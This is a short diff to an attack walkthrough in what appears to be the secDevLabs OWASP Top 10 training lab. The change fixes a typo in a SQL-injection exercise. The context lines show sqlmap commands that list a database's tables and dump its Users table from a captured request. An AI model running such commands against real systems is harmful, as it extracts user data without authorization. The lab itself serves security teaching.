globocom/secDevLabs/owasp-top10-2017-apps/a1/copy-n-paste/docs/ATTACK.md

 $ sqlmap -r postRequest.txt --tables
 ```

-And then retrieve sensitive information from the it:
+And then retrieve sensitive information from it:

 ```sh
 $ sqlmap -r postRequest.txt -D a1db -T Users --dump